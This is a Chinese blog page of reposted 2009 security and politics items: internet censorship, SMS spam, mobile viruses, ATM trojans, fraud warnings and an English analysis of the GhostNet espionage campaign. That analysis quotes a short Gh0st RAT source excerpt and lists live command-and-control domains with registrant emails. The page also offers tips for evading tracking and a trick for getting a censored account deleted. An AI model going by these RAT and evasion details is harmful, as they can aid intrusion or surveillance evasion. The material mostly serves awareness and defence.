  席佳琳(Kathrin Hille)北京、约瑟夫?梅恩(Joseph Menn)旧金山和季米特里?斯瓦斯托普洛(Demetri Sevastopulo)华盛顿报道。


More......

越来越多政府利用新技术控制网络

|

  From: http://www.voanews.com/chinese/w2009-04-02-voa41.cfm

  总部设在美国的人权团体"自由之家"表示,越来越多的国家政府正在试图用新的办法来控制和监视互联网。但是"自由之家"的报告同时指出,即使是在那些限制上网的国家,人们在抵制政府施行的限制方面正变得越来越有创造性。

  *自由之家审视十五国互联网自由状况*

  自由之家的这份报告从上网障碍、网上内容以及违反使用者的权利等方面检查了15个国家的互联网自由状况。

  该报告的助理编辑萨拉.库克说,拥有电脑技术的人数在急剧增加,但是互联网使用者得到的保护以及他们的安全却在不断恶化。

  她说:"越来越多的国家对政治内容进行审查,对博客作者进行逮捕,或者把博客作者送进监狱或者采取类似行动。这样就限制了人民使用这项技术的能力,特别是在交流政治或者社会问题的时候。"

  受到检查的大部分国家得到了"部分自由"的评价,其中包括埃及、格鲁吉亚、印度、肯尼亚、马来西亚、俄罗斯和土耳其。

  *中国、伊朗、突尼斯被列不自由*

  由于卡斯特罗政府对上网的绝对限制,古巴在所有15个国家中得分最低。对中国、伊朗和突尼斯这三个国家的评分是"不自由"

  库克表示,这些国家利用先进的技术来打压政府认为有害的内容。

  她说:"中国、突尼斯和伊朗,它们(限制网上自由)的方法之一是对互联网系统的主干进行中央管理。正是这种中央管理使得它们能够进行广泛的渗透,然后对很多事情进行监视。"

  *民众抵制政府监控越来越多有创造性*

  不过,自由之家的报告仍然发现了一个令人鼓舞的方面,那就是,在许多限制互联网自由的国家里,公民活动与日俱增。库克说,使用者正在创造出"密码字"来绕过敏感的"话题",并利用社交联络网址把他们自己组织起来。

  她说:"我们确实感觉到,人民正在越来越多地使用这种方式,使用政府不喜欢的方式,把自己组织起来。所以这些国家的政府也在使用不同的机制和技术来试图阻止这种现象的发生。"

  柯蒂基(音译Ko Htike)是一位缅甸政治博客作者,居住在伦敦。尽管自由之家的报告不包括缅甸,但是缅甸的军人政府时常对政治敏感的网站进行审查,并对网民进行监视。柯蒂基说,每天,世界上有大约两千人观看他的博客,有些人甚至从缅甸国内点击,而他的博客在缅甸是被屏蔽的。

  他说,缅甸网民观看他的博客是要冒很大风险的,但是他们希望从受到政府控制的媒体以外获得信息。

  他说:"如果在缅甸国内的人希望了解新闻以及反对派的消息,或者任何其他政治消息,他们只能通过博客得到。因为在缅甸国内,没有言论自由,也根本没有新闻自由。"

  自由之家的库克表示,她希望看到民主国家做出更多的努力,帮助和支持世界上普通的网民。


More......

教你在任意国内网站快速删除帐号

|

PS:就是用ID发GFW过滤词
from:http://initiative.yo2.cn/archives/638444
1. 备份自己的数据,把资料从目标网站上dump下来,修改/清除所有个人联系信息和资料。(其实数据的覆盖比删除安全很多。)
2. 挂proxy,打开大鸡院网站
3. 复制20多篇反☭的新闻,注意标题一定要狠,要吸引人,要哗众取宠。然后广泛粘贴到目标网站高流量的板块
4. 不出意外的话,个把小时之内你的帐号会被永久性的从目标网站服务器删除,而且不会留下任何痕迹。即使网站没有开发这个功能我想鹳狸猿直接操作数据库都会把你的帐号灭了。
More......

垃圾短信比垃圾邮件聪明的地方

|

from:http://www.awflasher.com/blog/archives/1742

  尽管三妖五陆续曝光了一大堆的垃圾短信发送业务,尽管已经有人大代表提出要从法律角度保护公民个人隐私,但就目前的实际情况来说,垃圾短信还是很难根除的。

  垃圾短信和垃圾邮件(junk mail)的原理一样,都是利用大量的受众群进行低成本广告,尤其是欺诈活动。但是,在这样一个充满千年智慧的土地上,垃圾短信行业显然比西方传入的垃圾邮件行业要更强大。

  回到这个问题的根源:欺骗究竟为什么能如此猖獗。答案非常简单,因为欺诈存在市场,这个市场比什么新媒体、SNS的那些市场要大得多。(虽然是一个病态的不健康的市场)

  这个市场存在的原因,我认为是:骗子总是比被骗的人聪明,可以这么简单理解:如果你的智商为130之高,那么只要一个骗子的智商有131,就可能骗到你;如果一个骗子的智商只有85,他仍然可以去骗那些智商低于85的人。更何况,这还参杂着诸如社会经验、行业壁垒在内的许多其他因素。(注:这里的智商只是用于比喻防骗能力)

  而垃圾短信行业的智慧则在于其"精准匹配" - 一个垃圾短信发布商发布一条智商为N的欺诈信息,只要找到那些智商为M, (M<N)的用户即可行骗成功而牟利。目前由于移动运营商对用户个人隐私的保护还不够成熟,以及之前广大人民群众缺乏保护意识,导致这种智商非常容 易被"获取"、"分析":

一方面,垃圾短信有极强的"无效过滤机制"(filters):垃圾短信并不会发到那些"企业白领"、"高校学者"和"机关领导"的手机里。因为这些人的投诉意识比较强、

另一方面,垃圾短信有极强的"自动化学习机制"(machine learning):发给1000个号码中,经常投诉或者难以欺诈成功的那一部分号码,会被加入到上面的过滤机制中。

  有这两方面的强力保障,垃圾短信欺诈在99%的情况下都可以欺诈成功:用这99%的盈利去应付那1%的"索赔",实在是太轻而易举的一件事情了。

总之,还是那句话,能不用手机,别用手机


More......

盗窃14万游戏币被判10年半

|

  PS:用NLP心理检定语言来解释法律规条,我们会发现大量充斥粗泛概念的词语,尤其在描述程度的多少时,通常并非那么具体。你能想象,"黑掉网站就是犯罪",然而并有具体描述行为、性质、程度等等时,法官的宣判解读就可以天马坠地宣判。
  在我看来,中国的刑法,是相当愚蠢的垃圾,量型重、不透明,绝大多数的法官的口头禅是:"因还没有这方面的相关法律"、"目前无具体的司法解释"。立法者不懂常识,最近一条网络安全法,我怀疑,这群傻X!法克尤!

  《中华人民共和国刑法》 第二百六十四条规定:"数额较大或者多次盗窃的,处三年以下有期徒刑、拘役或者管制,并处或者单处罚金;数额巨大或者有其他严重情节的,处三年以上十年以 下有期徒刑,并处罚金;数额特别巨大或者有其他特别严重情节的,处十年以上有期徒刑或者无期徒刑,并处罚金或者没收财产;有下列情形之一的,处无期徒刑或 者死刑,并处没收财产:(一)盗窃金融机构,数额特别巨大的;(二)盗窃珍贵文物,情节严重的。" 由于数额较大和数额巨大是一个模糊的形容词,也就为审判提供了弹性空间。《重庆晨报》报道,九龙坡区法院以数额巨大为由,一审判决盗窃久游币、联众币和魔兽点卡价值14万余元的"黑客"张某有期徒刑十年零六个月,并处罚金5万元;另外四名被告分别被判处有期徒刑三年至六年。 有兴趣的话可以比较一下贪污贿赂罪,刑法第三百八十二条规定"个人贪污数额在十万元以上的,处十年以上有期徒刑或者无期徒刑,可以并处没收财产;情节特别严重的,处死刑,并处没收财产。以下是一些最近的贪污案件 山西霍州原公安局长贪污约600万元被判17年;衡阳对北亚实业(集团)股份有限公司原董事长刘贵亭挪用公款9999.98万元人民币,贪污1337万余元人民币判无期;贪污32万医药公司经理获判12年半.....

bladerunner的评论
  90年代末连线杂志就登过,中国是唯一处死黑客的国家,记得地方是镇江。中国的判决向来政治、权力角力味道极浓,无权者往往灰飞烟灭,当年我见过为"金中 富"期货案件辩护的律师,一些企业投钱是为了投政府某些人物的喜好――他们当年力挺金中富,但是出事后外资方作为知情人获得了被扣留的护照开溜,国内投资 方的判决书在开庭时就已经拟定好,怎么辩护都没用。

  至于"那个年代",就别提了,有代人做毛主席石膏像的青年工人因为把做坏的石膏像扔掉被枪决的。至于著名的"内人党"案件,通过大规模的刑讯捏造了一个子 虚乌有的几十万人的反党集团,不到50年时间抹平一切,今日在海外唧唧歪歪"西藏农奴遭受酷刑"的小奶嘴们估计根本没听说过,即使告诉他们也"不很关心政 治",而西藏问题则"不是政治问题"。当年我了解内人党案件是通过大陆华龄出版社的《中国左祸》,陈列的还都是党"平反昭雪"的案例,如果现在还能找到, 建议关心历史的人去看看。


More......

手机病毒是怎样攻击手机的?

| 2009年3月31日星期二

  手机病毒的传播方式

  1.利用蓝牙方式传播

  200412月,"卡波尔"病毒 在上海发现,该病毒会修改智能手机的系统设置,通过蓝牙自动搜索相邻的手机是否存在漏洞,并进行攻击。

  2 感染PC上的手机可执行文件

  2005111日,"韦拉斯科"病毒被发现,该病毒感染电脑后,会搜索电脑硬盘上的 SIS可执行文件并进行感染。

  3.利用MMS多媒体信息服务方式来传播

  200544日,一种新的手机病 毒传播方式出现,通过MMS多媒体信息服务方式来传播。

  4.利用手机的BUG攻击

  这类病毒一般是在便 携式信息设备的" EPOC"上运行,如"EPOC-ALARM"、"EPOC-BANDINFO.A"、"EPOC-FAKE.A"、"EPOC-GHOST.A"、 "EPOC-ALIGHT.A"等。

  手机病毒的攻击对象

  一、以"病毒短信"的方式直接攻 击手机本身,使手机无法提供服务,这种手机病毒是最初的形式,也是目前手机病毒的主要攻击方式。

  二、攻击 WAP服务器使WAP手机无法接收正常信息。很多新型手机都支持WAP上网,而手机的WAP功能需要专门的WAP服务器来支持,一旦有人能发现WAP服务器的安全漏洞,就可以编制出能攻击WAP服务器的病毒,并对其进行攻击,影响WAP服务器的正常工作,从而使手机无法接收到正常的网络信息。

  三、攻击和控制"网关",向手机发送**信息。如果一些手机病毒的作者能找 到手机网络中的网关漏洞,同样也可以利用该漏洞研制攻击网关的手机病毒,一旦攻击成功,将会对整个手机网络造成影响, 使手机的所有服务都不能正常工作。

  四、攻击整个网络。如今有许多手机都支持运行JAVA(一种编程语言)小程序, 比如通过手机下载的小游戏,如果病毒作者可以找到这些JAVA漏洞的话,可以利用JAVA语言编写一些脚本病毒,来攻击整个网 络,使整个手机网络产生异常。

  手机病毒的预防

  1.乱码短信、彩信。

  乱码短信、彩信可能带有病毒,收到此类短信后立即清除,以免感染手机病毒。

  2.不要接受陌生请求。

  利用无线传送功能比如蓝牙、红外接收信息时,一定要选择安全可靠的传送对象,如果有陌生设备请求连接 最好不要接受。因为前面说过,手机病毒会自动搜索无线范围内的设备进行病毒的传播。

  3.保证下载的安全性。

  现在网上有许多资源提供手机下载,然而很多病毒就隐藏在这些资源中,这就要求用户在使用手机下载各种资源的 时候确保下载站点是否安全可靠,尽量避免去个人网站下载。

  4.选择手机自带背景。

  漂亮的背景图 片与屏保固然让人赏心悦目,但图片中带有病毒就不爽了,所以用户最好使用手机自带的图片进行背景设置。

  5 不要浏览危险网站。

  比如一些黑客,色情网站,本身就是很危险的,其中隐匿着许多病毒与木马,用手机浏览此类网站是非常危险的。

  手机病毒的清除

  现在,清除手机病毒最好的方法就是清除带有病毒的短信。如果发现手机已经感染病毒,应立即关机,死机了,则可取下电池,然后将 SIM卡取出并插入另一型号的手机中(手机品牌最好不一样),将存于SIM卡中的可疑短信清除后,重新将卡插回原手机。如果仍然无法使用,则可以与手机服务商联系,通过无线网站对手机进行杀毒,或通过手机的IC接入口或红外传输接口进行杀毒。


More......

安全聚焦:危机四伏的ATM取款机

| 2009年3月30日星期一

  【IT专家网独家】随着攻击技术的日新月异,针对自动取款机的攻击事件已不再是新闻:我们见到过使用嗅探器攻击ATM,还有使用伪造身份(钓鱼攻击)成功进入ATM,甚至有人利用物理手段攻击ATM。但是最近一种新的针对ATM的攻击方式(ATM机器插入盗取信息的恶意代码),引起了所有人对 ATM安全的关注。

  Sophos最近研究发现,Diebold ATM机器中装有能够窃取用户信息的木马程序,Diebold公司在一月份针对其windows系统的Opteva ATM机发布了一项新的安全更新,当时已经表示在俄罗斯发现部分机器被物理性攻击并被渗透木马软件。

  Diebold公司发言人表示,"我们立即通知全球范围内的客户关于该恶意软件的风险,并发布了风险防范软件更新,我们意识到俄罗斯发生的事件的危险性,攻击者通过在ATM所在位置物理进入ATM机器,然后让拥有专业黑客技术的攻击者安装恶意软件。"

  Sophos的资深技术顾问Graham Cluley表示,"攻击者十分精通ATM取款机内部软件,能够精通到这种程度确实让人刮目相看,他们知道API调用,了解现金机器的运行方式,攻击者的精心准备让我们颇为意外。"

  "这不是一般攻击者能够达到的水平,"他补充说,"他们首先需要真正进入到ATM机器中,需要有人在里面处理这些设备以进入系统并安装软件。"

  目前还不清楚攻击者怎样进入取款机内部的,但是安全专家表示,这代表着一种对银行机器的全新攻击方式,而且这个可能只是整个攻击的皮毛而已。可能有许多地方的ATM被安装了这种类型的恶意隐藏木马。

  Diebold公司在其对ATM机器的安全更新中对客户表示,攻击者已经被抓获,正在进行调查。一旦攻击者能够进行ATM机器内部,他们就能够植入恶意软件和拦截敏感数据。当windows管理密码被获取或者内置防火墙禁用时,这种攻击的风险就会增加。

  与此同时,Solidcore公司一月份时从其ATM客户处初次了解到Diebold攻击,Solidcore公司的OEM解决方案首席技术官 Kishore Yerrapragada表示,攻击者去年年底通过IP连接感染机器的,攻击者们非常熟悉ATM机器内部和外部的构造以及运行方式。

  专家表示,攻击者将机器转换到所谓的"维修或者系统模式",这时候安全保护和加密就因为调试或者系统维护而被关闭,只有对系统内部非常了解的人才可能做到这一点,这能够使黑客通过木马获取ATM机器的数据。

  此次发现的木马软件能够收集PIN码以及所谓的Track 2加密数据(存储在ATM卡的磁条上),这能够使攻击者复制真正的ATM卡。然后攻击者会插入自己特质的卡到被木马感染的ATM机器进入帐户系统,取款机就会通过机器系统打印出被窃取的信息。

  SophosCluley谈到攻击时说,"这种攻击方式的最大优势在于,你不能发现ATM机器被动过手脚,完全是在内部进行的。"

  这种攻击与近日发生在欧洲的攻击相类似,大型连锁超市的几个结账读卡器被发现内置了嗅探器,攻击者在生产过程中就进行了安装,因此从外面根本看不出来被破坏了。专家透露,这些被攻击超市包括位于英国Asda的沃尔玛超市。

  然而,这种有针对性的ATM攻击不可能取代低成本、即插即用、全网络钓鱼攻击窃取银行帐户的攻击方式。大多数犯罪分子无法进入ATM机器内部,虽然这种方式十分诱人。

  这些攻击也暴露了这些取款机的安全弱点,Network Box的安全分析专家Simon Heron表示,"我希望看到ATM机器向支付处理器发送信息时通过SSL VPN加密或者某种VPN连接加密。这些ATM机器同样还需要更多的硬件保护,包括IDS/IPS防火墙等。"

  ATM机器中通常都会有运行时间和变化控制工具来检测可疑活动,因此系统不能只是进行周边防护,需要加强另一层防护以防止对系统的更改。

  Sophos公司的Cluley说道,"这次的ATM攻击事件对于ATM制造商来说应该是一次警醒,所有生产ATM设备或者银行设备的厂商在创造和生产这些设备的时候需要确保这些系统是安全的,必须确保全过程没有被交换或者修改过。


More......

GhostNet or Gh0st RAT: The Cyber Persecution of Tibet

|

PS:记得去年从坏坏手里拿到最新版本的Gh0st时,没预料到开源后成了间谍木马....出名了~(进一步证明ZF正在……)

For many members of the non-security research community, the New York Times story this week was big news: "Vast Spy System Loots Computers in 103 Countries". This morning's Google News has more than 750 related articles, and I applaud the work of the University of Toronto's Citizen Lab at the Monk Centre for International Studies at Trinity College for the excellent research and for sharing this story with the general public.



What does it look like to a Security Researcher though? Unfortunately, its a very common story of a very simple case of Spear Phishing that can be accomplished with minimal effort and *IS* being accomplished on a daily basis against various special interests, including government agencies, military contractors, or just people who might have a lot of money to steal. As I've discussed in my presentations on Spear Phishing, including at the 2008 Department of Defense Cyber Crime conference, high-value targets deserve special targeting. But let's look at how special the targeting was in this situation.

The news that someone was creating specifically targeted spear phishing campaigns against Tibet and Tibetan sympathizers first came to my attention in March 24, 2008, when our friends at the SANS' Internet Storm Center released the article, Overview of cyber attacks against Tibetan communities by Maarten Van Horenbeek. This was an in-depth follow-up to Maarten's initial report on March 21, 2008, Cyber attacks against Tibetan communities.

In the original article, Maarten describes the case this way:


The attacks generally start with a very trustworthy looking e-mail, being spoofed as originating from a known contact, to someone within a community. Some impressive social engineering tricks are used:
  • Messages make a strong statement on a well known individual or group, but do not mention its name. The attachment is then named after that individual. A state of 'cognitive dissonance' is invoked between the reader's pre-existent beliefs and the statement. There's a natural urge to click on the attachment to confirm that belief;
  • The writing style of the purported sender is usually well researched to have the message look as believable as possible;
  • The content of the document actually matches closely what was discussed in the e-mail message;
  • Having legitimate, trusted, users actually forward along a message back into the community.


The messages contain an attachment which exploits a client side vulnerability. Generally these are:
  • CHM Help files with embedded objects;
  • Acrobat Reader PDF exploits;
  • Microsoft Office exploits;
  • LHA files exploiting vulnerabilities in WinRAR;
  • Exploitation of an ActiveX component through an attached HTML file.


At that time he showed how PowerPoint files with names such as "reports_of_violence_in_tibet.ppt" and or "China's Tibet.pdf" contained exploits and were delivered in emails designed to elicit a trust-response from the reader if they were sympathetic to the cause. Here's one email that Maarten shared:


All,

Attached here is the update Human Rights Report on Tibet issued by
Department of State of U.S.A on March 11, 2008.

You may also visit the site:

Tashi Deleg,

Sonam Dagpo

Secretary of International Relations
Department of Information & International Relations
Central Tibetan Administration
Dharamshala -176215
H.P., INDIA
Ph.: [obfuscated]
Fax: [obfuscated]
E-mail: [obfuscated]@gov.tibet.net or diir-pa@gov.tibet.net
Website: http://www.tibet.net/en/diir/


Maarten confirmed that the contact information was correct for a member of the Tibetan Government in exile in Dharamshala, India.

In the case of the Citizen Labs report, the name of the report was the first thing worth mentioning. The report was called "Tracking GhostNet: Investigating a Cyber Espionage Network". Why was it called GhostNet? Because the enabling technology in their investigation was a common Remote Administration Trojan called "Gh0st RAT" (that's Gh0st with a Zero).

It took about 30 seconds to find a copy of Gh0st RAT 3.6 in the Chinese underground community, complete with source code. The program is written in VC++ version 6.0. The source code makes clear that, as is the case with many Chinese distributed malware products, the current distributor is a Chinese speaker speaking to a Chinese audience, although the comments make it quite possible the code was originally authored and designed for English speakers. Here's an example Code Snippet:


/////////////////////////////////////////////////////////////////////////////
// CGh0stApp construction

CGh0stApp::CGh0stApp()
{
// TODO: add construction code here,
// Place all significant initialization in InitInstance

// 初始化本进程的图像列表, 为加载系统图标列表做准备
typedef BOOL (WINAPI * pfn_FileIconInit) (BOOL fFullInit);
pfn_FileIconInit FileIconInit = (pfn_FileIconInit) GetProcAddress(LoadLibrary("shell32.dll"), (LPCSTR)660);
FileIconInit(TRUE);

HANDLE hFile = CreateFile("QQwry.dat", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hFile != INVALID_HANDLE_VALUE)


(According to Google Translate, the Chinese here says roughly: 为加载系统图标列表做准备 = Initialize the image list of this process, and 为加载系统图标列表做准备 = Icon to load the system ready to do list

While many of the notes in the source code have been rendered in Chinese, it still reads as those these are after-thought comments, and not the original author's words.

Still, Gh0st RAT China has been in development as a Chinese tool for some time - the version that was popular in China in early 2008 was Beta 2.5. and seems to have been primarily distributed by members of the "C.Rufus Security Team" or "CRST" through their website wolfexp.net (which is suddently not online???). While wildenwolf's website seems offline, another CRST member, amxku, still has a great deal of notes available on his blog at amxku.net.

One of the main researchers in the Sec Dev project, Gregory Walton, previewed some of this report at a presentation he did in Dharamshala, India back in 26 August 2008 called "Year of the Gh0st Rat".

The Citizen Lab report investigates a large botnet which was enabled by the Gh0st Remote Administration Trojan. In their technical findings, they reveal that the members of the network of their investigation received emails with malicious attachments, very similar to what Maarten reported at ISC back in March. Here's one of the Citizen Lab report emails:






Something else very interesting emerges as we begin digging into some of the technical information shared in the Citizen Lab report.

For example, they mention two domain names used as Command & Control points for the by Gh0st machines they were tracking:

macfeeresponse.org and scratchindian.com

At the time the IP address they were tracking was 218.241.153.61, but now both of those domains are resolving to the IP 210.51.7.155, in China. Other domain names on that same IP address may be domain names of concern, including:

indexindian.com - opanpan@gmail.com
lookbytheway.com - losttemp33@hotmail.com
macfeeresponse.com - losttemp33@hotmail.com
macfeeresponse.org - losttemp33@hotmail.com
MSNxy.net - yglct@sina.com
MSNyf.net - yglct@sina.com
NetworkCIA.com - yglct@sina.com
ScratchIndian.com - opanpan@gmail.com
sysroots.net - yglct@sina.com
timeswindow.net - yglct@sina.com
womanld.com - yglct@sina.com
womannana.com - yglct@sina.com
ybbero.com - yglct@sina.com
yellowpaperofindia.com - losttemp33@hotmail.com
yfhomes.com - yglct@sina.com

A simple Google on most of these domain names will reveal that they are all known to be related to malicious software and botnet activity, but they are still sitting live in China.

The Citizens Lab report reveals that documents from a computer in the Dalai Lama's own office were being exfiltrated to "www.macafeeresponse.org" during the course of the investigation.

While their report focused on traffic related to this Tibet group, it is clear that there are many other groups, with covert traffic being sent back to China and elsewhere, and that it is trivial to create such an infection using commonly unpatched or underpatched exploits, easily downloadable malware, and hard-to-stop social engineering techniques.

If others are seeing data communicating with the domain names listed above, please take action. Report these communications so that we can learn what other groups, besides the Tibet group, may be losing intelligence and internal documents to these data stealing botnets.
More......

胡扯闲聊~安全守则

|

PS:不属于本拉登,暂时没有必要看
from:http://www.6code.net/zaqizaba/security_rules.html

适用范围人群

1.被杀手集团追杀
2.被黑客追踪
3.被商业竞争对手调查
4.被私人侦探调查
不适用范围人群
1.被政府秘密通缉
2.被公安厅通缉
3.被他国国家安全部门通缉

守则内容
1.住所不固定,即使有自己的房子,也会租一套以上的房子备用。
2.工作地点不固定,无论是因为工作地点变动而导致的自然不固定,或是其他理由限制,都最好能努力为自己提供一个不固定的工作地点。
3.通讯方式不固定,手机卡每换一个地方即换卡,QQ每换一个地方即换号。个人电脑中每登陆完一次QQ或邮箱等包含个人信息的东西后便立即清除登陆痕迹。登陆的同时加上跳板,无论国内或国外,以防有人能够通过某种关系或手段查到你最近一次的登陆IP。
4.交通方式不固定,此处由于国家政府和公安部门有权限调取出入境和交通记录以外,其他任何部门都没有权利。这也是为什么本安全守则不适用于开头所列的三类人群之原因。
5.除了你本人以外,其他任何人不应该知道你目前所住的详细地址。
6.除了你本人的大脑和皮肤以外,其他任何地方,包括纸制品,个人电脑或者手机、光盘,移动硬盘等一切存储介质上,都不应留有你的保密信息,包括:常用ID、密码,最重要的人的联系方式。
7.不得向任何人直接或间接提及你的职责范围和工作内容。

以上是我的个人经验总结,相信以上7条都做到位,那么除非你是《越狱》中类似的全国通缉犯或是被其他国家清查的间谍,你都能够安全的生活。当超过对方可付出的时间成本周期之后,对方会放弃,你便可重获自由,恢复正常人身份。


More......

瑞星个人隐私安全报告(2009)

|

瑞星个人隐私安全报告(2009

下载地址:http://tech.qq.com/doc/SNSAQ.doc

Dump.ru


More......

诈骗集团新手法

|

  今天是200856...由於在吃晚餐时看到新闻播出诈骗集团佯称自己是台北刑事局警员,来电电话也显示正确.地址确实也正确.再加上又佯称是检察官并当下做录音动作.......

  所以寻找以下案例供大家参考.不要上当受骗了喔!!!

  ==============================================================================

  下午收机接到一通电话,对方自称是台北市刑事局警员,自称警员的说查获诈骗集团,主嫌犯冒用人头开户作案洗钱,检察官目前已经起诉不少人,要我们做语音笔录呈给检察官。询问是和银行是否有借贷往来,办哪些银行的信用卡和现金卡,刑事局会去调阅联合徵信纪录,查看我们和银行的往来状况,而且我们会收到法院传票,届时需要出庭作证个人清白,然後自称刑事局的警员还会问:

  1.有在什麽银行分行开户?

  2.存摺上最後一次的存余是多少钱?。

  我觉得很奇怪照着手机显示的号码,向1288查号台询问,查号台说这只号码没有登记所在单位,再给我台北市刑事局号码。打电话过去警员说已经有很多人报案了,那是诈骗集团要小心点,因为我们在外面会留下个人资料,有的不肖业者和诈骗集团挂勾,诈骗集团会向不肖业者购买个人资料,以致个人资料外泄。

  *重点:

  千万不要随便透露自己在银行有多少存款哦!以防存款遭窃。

  诈骗集团:(02)-23886558

  台北市刑事局:(02)-23817263

  * 2007-09-18 23:18:57 补充

  自称刑事局员警的也是问我认识"周建裕"这个人吗?我有没有在玉山及安泰两家银行的帐户?连我的身分证字号、户籍地址、出生年月日也都说出来,就问我有在什麽银行开户,要我存摺上最後的日期跟存余,我就笨笨的跑去翻一堆银行存摺,还一本一本的告诉他,幸好我的钱早就没有存在银行的习惯,不然我真的会哭死。

  我是後来跟妈妈讲这件事情,妈妈就分析给我听说是诈骗集团,我就打电话去求证看到底是不是,现在的诈骗集团花招百出啊。

  ==============================================================================

  我整理了一些目前各式各样的诈欺手法,藉以宣导民众勿成无辜被害人!

  一、近来警方查获假藉公司行号名义,专门以贩卖「灵骨塔」方式,诈骗独居有钱老人或是刚退休想投资人,至许多民众惨遭诈骗退休金案件,该集团诈骗手法如 下:

  1、利用曾经营「瓦斯安全开关公司」,大量�集数万笔客户资料,分析客层属性後锁定被害人。

  2、招募培训业务员接受「卡00心理课程」,教导如何鼓吹、引诱客户投资购买灵骨塔。

  3、分配对象名单,由业务员前往家中拜访诈骗。

  4、被害人报持小额投资获利心态(转售可一倍以上获利)有某一妇人2年内认购30个(每个62000元)因无钱续购竟遭集团份子载至保险公司以保单质押现金。

  二、谎称金管会,提供安全帐户诈骗最近本分局已受理数件诈财案件,歹徒会佯称金管会人员,电话告知被害人身分遭冒用或信用卡遭盗刷,银行帐户资金恐遭冒领,户头不安全,便佯称可提供1个「安全帐户」,便有被害人不疑有他,将钱领出存入诈骗集团的户头,被骗金额均超过非约定转帐3万上限,民众不可不防。

  三、诱骗被害人到银行直接临柜汇款 诈骗集团先以电话佯称做「市场调查」,让被害人留下印象,隔1周再以电话谎称中奖,假如不付手续费便失去资格等,一步一步引诱被害人上勾。

  四、假网路拍卖诈财 卖家(诈骗集团)大方告诉网友(被害人)「收到货再付款」,被害人收到货後便汇款给卖家,事实上卖家是用伪造的信用卡订货,等追查货物流向时,便找上网友,可说得不偿失。

  五、假藉法院名义,诱使民众拨打高额电话诈骗集团假藉地方法院名义,以电话语音通知民众有公告文件或过期罚单,民众担心负上严重後果,按照语音指示,按「9」转接服务人员查询,对方即询问姓名等佯称核对电脑资料,透过这种方式转接,民众得付出高额通话费。(资料提供:95.04.28侦查队-陈军生)

  六、佯称中奖-诈骗集团利用大量简讯传送「中大奖」、「中轿车」内容,并 冒充金融机构人员,要求被害人以提款机转帐方式或临柜汇款方式预先缴付税金 ,被害人依嫌犯指示操作提款机或至银行完成汇款後,嫌犯打电话谎称没有转帐成功,并表示该款项被留滞於「金资中心」,於是告知被害人拨打另一线 0800 金资中心服务电话(由嫌犯申办之假金资中心服务电话)。被害人打 0800 电话後,伪称金资中心服务人员再次指示被害人至提款机汇款以完成或退回该笔款项,被害人深信不疑,便依指示再次将钱汇至人头帐户中,骗得被害人户头内的存款,被提领一空。(资料提供:95.05.05侦查队-陈军生)

  七、

  1. 中华电信语音催收电话费的电话您曾经接到过吗?您可要小心了!

  根据165专线两周来的持续追踪观察发现,诈骗歹徒以中华电信的名义,大量发出电话语音通知,目的就是要骗人去办理电话语音约定转帐,骗光所有存款,已有多人被骗,如台中县黄小姐被骗了60万,台北市吕小姐被骗200万、高雄萧太太被骗54万,此手法流程如下:

  1.您接到语音电话:「这里是中华电信,您好,您积欠电话费1万○○元,尚未缴清,请尽快缴纳,如有任何问题请按9。」

  2.您按9询问时,对方的回答:「您的电话02-****0000,现在有15012元尚未缴清,再不缴会停话。」

  3.当您质疑我没有申办这个电话号码时,歹徒回答:「这个电话是去年11月以您的名义申办的,因一直打国际电话,所以费用才会那麽高,如果没有申办此电话,可能是被人冒名申办的。请拨02-2200****去跟电信警察报案。」

  4.当您拨此电话,假电信警察队会说您涉嫌吸金诈欺、洗钱,并以作电话笔录套问您银行往来开户、申请信用卡情形(其实这个动作是在统计可以藉电话转帐诈骗之金额数)

  5.接着又将电话转接至「国家安全帐户管制局」(并无此机关)做安全监控,要您到银行办理语音约定转帐设定,若您在电话中说出了「帐号」、「密码」,就可能被骗光所有存款。

  2.因应预防之道:

  1. 若接到中华电信语音催收话费,可拨打中华电信「123」服务电话确认。

  2. 欠电话费直接至电信公司缴费即可,不可能由中华电信人员通知涉及「个 人资料遭冒用」,中华电信也不会主动提供警察办案单位电话。

  3. 目前金融机构的电话语音约定转帐已成为歹徒诈骗最佳管道,最主要原因就是一般民众并不知道此设定绝对不可泄露「帐号」、「密码」,因此若接到不明来电,并且要求做此设定,请务必先拨打刑事警察局「165」反诈欺专线查证,以免被歹徒骗光所有存款。*再次提醒民众,勿贪小便宜,遭诈欺集团利用,出卖身分申请「人头帐户」及「人头电话」,协助犯罪,害人又害己。 (资料提供:95.06.05侦查队-陈军生)

  * 2007-09-18 15:50:05 补充

  收到货再付款,这是很高招的骗术(一定要看啊!)网路广告最近一些高价的东西,例如:手机、DVDnotebookDC.....等,都便宜的离谱,并告诉你�收到货再付款�。(不要以为�收到货再付款�就不会被骗钱...)虽然你会收到全新的机器,而且操作正常,心想:这样应该就没问题了,所以就把钱汇给他。结果原来他是用假信用卡去订货,然後直接从邮购公司寄到你家,你以为已经收到货,所以就汇钱给他,等到邮购公司发现是假信用卡时,追查货物流向,就找上你家,货不但被收,你还得澄清不是你使用假信用卡。可以把这个邮件转寄给你所认识的每个人,以免有人被骗!

  * 2007-09-18 15:50:07 补充

  「假辅导长、真诈财」

  犯罪手法:

  一、 诈骗集团诿称是部队的辅导长,因其儿子与人发生车祸,要与对方和解,必须赔偿车主修车费。

  二、 民众不疑有他,依指示汇款至歹徒帐户。

  * 2007-09-18 15:50:39 补充

  假名应徵房屋销售员真诈骗签约金

  犯罪嫌疑人以假名应徵房屋销售员後,将待售房屋之钥匙复制,於电脑网路及报纸刊登租屋广告,佯装房东与房客签约并索取签约金之诈骗案例。为遏止此类诈欺手法发生,造成民众财产生损失。

  * 2007-09-18 15:52:07 补充

  假藉大哥大公司寄送「债权让与通知书」诈骗

  北县瑞芳一位周姓侦查佐,曾经接到一张台湾大哥大公司寄来的「债权让与通知书」,称积欠电话费 15779元,且台湾大哥大已将债权转让给一家「汇诚第一资产管理股份有限公司」进行催讨,希望他能於七日内将欠款缴清。否则将进行法律程序诉追。但周姓侦查佐本身未申请台湾大哥大公司电话,因而警觉这是诈骗集团所设的骗局。

  * 2007-09-18 15:57:24 补充

  上网援交,被骗上百万元

  一名私人公司的李姓主管因上网在网站聊天室聊天时,突然有一自称「涵艺」女子进入聊天室与其聊天,该女子更因表达想交往并且援助交际,经过几十分钟後要到了李姓主管的电话後就离开了聊天室。该名女子骗李姓主管前往提款机前操作,骗说是要确认是否为军警人员

  * 2007-09-18 15:57:39 补充

  假冒台北市社会局诈骗民众财物

